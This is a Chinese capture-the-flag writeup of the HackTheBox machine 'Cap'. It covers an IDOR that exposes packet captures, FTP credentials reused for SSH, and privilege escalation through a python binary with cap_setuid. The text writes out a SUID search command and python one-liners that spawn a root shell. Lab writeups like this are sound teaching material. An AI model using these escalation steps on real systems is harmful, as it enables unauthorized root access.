banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

htb靶场 - Cap

Cap#

ip:10.10.10.245

Cap 是一台简单难度的运行 HTTP 服务器的 Linux 机器,该服务器执行包括执行网络捕获在内的管理功能。不当的控制导致不安全的直接对象引用(IDOR),从而获得对另一用户捕获的访问权限。该捕获包含明文凭证,可用于获得立足点。随后利用 Linux 功能提升至 root 权限。

task1
有多少 TCP 端口是开放的?

3

0a3b63c90efdde661a0cd2ca8c9fb567_MD5

task2
运行 “Security Snapshot” 后,浏览器将重定向到格式为 /[something]/[id] 的路径,其中 [id] 代表扫描的 ID 号。 [something] 是什么?

528ab93b652c321e083476b15704cffc_MD5

task3 你能查看其他用户的扫描结果吗?

通过更改 data 后面的数字 id,可以查看其他用户的扫描结果

task4 PCAP 文件包含敏感数据的 ID 是什么?

538c44c3ee6e4ab0fa9c8f1e91eb49da_MD5

25d1f22548598d75dda64dcdb92fbaea_MD5

62e53d034c91de170301a5beefb6a543_MD5

id 指的是 data 的编号,在 0 号 pcap 文件中有 ftp 登录的账号信息

task5 在 pcap 文件中,敏感数据会出现在哪个应用层协议里?

ftp

task6 我们拿到了 Nathan 的 FTP 密码。这个密码还能用在其他什么服务上?

ssh

task 7 提交位于 nathan 用户主目录中的 flag

ssh nathan@10.10.10.245

登录后即可看到 flag

task8 提交 root 目录下的 flag

查看 suid 位设置

find / -perm -u=s -type f 2>/dev/null

c7cacbd5aa296cfdad067ce817920fdb_MD5

提权脚本

https://github.com/carlospolop/PEAss-ng/tree/master/linPEAS

上传至靶机 10.10.10.245

9d8d11c9f2f53b0b55e9a9b284497887_MD5 

python

参考:https://gtfobins.github.io/gtfobins/python/

cp $(which python) .
sudo setcap cap_setuid+ep python

./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
/usr/bin/python3.8

import os
os.setuid(0)
os.system("/bin/bash")

78abb3c1c434aed28bfd4a4e6224ec89_MD5

加载中...
此文章数据所有权由区块链加密技术和智能合约保障仅归创作者所有。